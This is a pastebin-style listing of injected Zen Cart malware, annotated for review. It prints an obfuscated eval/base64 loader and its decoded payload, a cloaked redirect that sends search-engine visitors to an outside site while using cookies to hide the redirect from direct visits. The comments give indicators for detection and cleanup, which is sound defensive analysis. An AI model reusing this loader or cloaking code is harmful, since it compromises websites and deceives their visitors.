hackrepair

Custom zencart redirect hack

Jun 9th, 2012
  1. <?php
  // reverse(): returns $str with its bytes in reverse order. An empty value
  // (loose == '' comparison) yields null, and a one-character string is
  // returned unchanged. strrev() does the same job; hand-rolling it looks like
  // a way to keep well-known function names out of the file, and the only call
  // visible in this listing feeds it a reversed function name.
  2. function reverse($str){
  3. if($str == ''){
  4. return null;
  5. }
  6. if(strlen($str) == 1){
  7. return $str;
  8. }else{
  9. $string = "";
  // Walk from the last byte to the first using negative substr() offsets.
  10. for($i=1;$i<=strlen($str);$i++){
  11. $string .=substr($str,-$i,1);
  12. }
  13. return $string;
  14. }
  15. }
  // Loader stage. reverse("edoced_46esab") evaluates to the string
  // "base64_decode"; $zencart is then called as a variable function and its
  // return value is handed to eval(). The function name exists only at run
  // time, so a search for the literal text base64_decode next to eval() does
  // not match this file -- scanning for eval() fed by a variable function call
  // is the more reliable signature.
  // NOTE(review): eval() of a decoded string executes whatever the blob holds
  // with the privileges of the web application. Treat a file carrying this
  // pattern as modified and compare it with a known-good copy of the same
  // release rather than trying to clean it in place.
  16. $zencart=reverse("edoced_46esab");
  17. eval ($zencart('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'));
  18. ?><?php
  19.  
  20.  
  21. DECODED (the payload passed to eval() above, after decoding):
  22.  
  // Set-up for the redirect logic that follows.
  // error_reporting(7) = E_ERROR | E_WARNING | E_PARSE: notices are not
  // reported while this code runs.
  23. error_reporting(7);
  // Marker values compared against the USERID cookie below: "shine-check" is
  // the value set together with a redirect, "twotime" the value set when no
  // redirect is issued. Both strings, and the cookie name, are usable as
  // indicators when reviewing traffic captures or browser state.
  24. $check ="shine-check";
  25. $check2 ="twotime";
  // $adsen_code and $CookieTime are assigned here but not referenced again in
  // the decoded text shown in this listing.
  26. $adsen_code ='';//
  27. $CookieTime=0;
  // Conditional (cloaked) redirect. Three cases, keyed on the USERID cookie:
  //   1. USERID == "shine-check": the browser was redirected before, so it is
  //      redirected again on every request.
  //   2. USERID == "twotime": the browser was classified as "do not redirect";
  //      nothing happens.
  //   3. no matching cookie: classify the request from its Referer and
  //      Accept-Language headers and set one of the two cookie values.
  // A direct visit (no Referer) therefore ends in case 3's else branch,
  // receives "twotime", and is never redirected for that browser session;
  // checking the page by typing its URL does not reveal the behaviour.
  28. if (isset($_COOKIE["USERID"]) and ( $_COOKIE["USERID"]==$check ) )
  // No exit/die follows the Location header in the visible code, so the
  // including page keeps executing after the header is queued.
  29. {Header("Location: http://www.themagicmoment.co.uk");}
  30. else if (isset($_COOKIE["USERID"]) and ( $_COOKIE["USERID"]==$check2) )
  31. {
  32. }
  33. else
  34. {
  // Candidate list: indexes 0-38 hold the http URL, indexes 40-99 a mailto:
  // address; index 39 is never assigned.
  35. $target_url=array();
  36. //$target_url[0]="http";
  37. for($i=0;$i<39;$i++)
  38. {
  39. $target_url[$i]="http://www.themagicmoment.co.uk";
  40. }
  41. for($i=40;$i<100;$i++)
  42. {
  43. $target_url[$i]="mailto:hackseo@post.com";
  44. }
  // rand_array(): places each element of $arr into a randomly chosen free slot
  // of a new array and returns it. When the chosen slot is already occupied
  // the loop index is stepped back so the same element is tried again.
  // Declared inside the else block, so the function only comes into existence
  // when this branch runs.
  45. function rand_array($arr)
  46. {
  47. $arr_size=sizeof($arr);
  48. $tmp_arr=array();
  49. for($i=0;$i<$arr_size;$i++){
  // The generator is reseeded from the current microsecond fraction on every
  // iteration.
  50. mt_srand((double) microtime()*1000000);
  51. $rd=mt_rand(0,$arr_size-1);
  // NOTE(review): this reads slots that have not been assigned yet. On PHP 8
  // an undefined-key read is an E_WARNING, which error_reporting(7) still
  // reports -- such warnings in the error log may point at the injected file;
  // confirm against the host's PHP version and display/log settings.
  52. if($tmp_arr[$rd]=="")
  53. {
  54. $tmp_arr[$rd]=$arr[$i];
  55. }
  56. else
  57. {
  58. $i=$i-1;
  59. }
  60. }
  61. return $tmp_arr;
  62. }
  63. $attack_url=rand_array($target_url);
  64. $attackurl="www";
  // Accept-Language is read without an isset() guard; Referer is defaulted to
  // an empty string when the header is absent.
  65. $l1=$_SERVER["HTTP_ACCEPT_LANGUAGE"];
  66. if(isset($_SERVER['HTTP_REFERER'])){
  67. $a1 = $_SERVER['HTTP_REFERER'];
  68. } else {
  69. $a1 = '';
  70. }
  71. $l2="zh";
  72. $a2="bing";
  73. $a3="com.hk";
  74. $a5="google";
  75. $a4="yahoo";
  // Redirect only when ALL of the following hold:
  //   - Accept-Language does not contain "zh" (strict === false);
  //   - Referer does not contain "com.hk" (loose == false, so a match at
  //     offset 0 also counts as "not found");
  //   - Referer contains "bing", "google" or "yahoo" at an offset other than 0
  //     (loose == true is false for offset 0 and for no match);
  //   - slot 1 of the shuffled list contains "www" past offset 0. Only the
  //     http entry satisfies this, the mailto entry does not, so just a
  //     fraction of otherwise qualifying requests is redirected and the
  //     behaviour is not reproducible on every attempt.
  76. if (( strpos($l1,$l2) === false )and( ( strpos($a1,$a3) == false ))and(( strpos($a1,$a2) == true )or( strpos($a1,$a5) == true )or( strpos($a1,$a4) == true )) and ( strpos($attack_url[1],$attackurl) == true )) {
  // Session cookie (expiry 0) on path "/", then the off-site Location header.
  77. setcookie("USERID", "shine-check", 0,"/","");Header("Location: $attack_url[1]");}
  78. else
  79. {
  // Every other first-time request is marked so it is left alone afterwards.
  80. setcookie("USERID", "twotime", 0,"/","");
  81. }
  82. }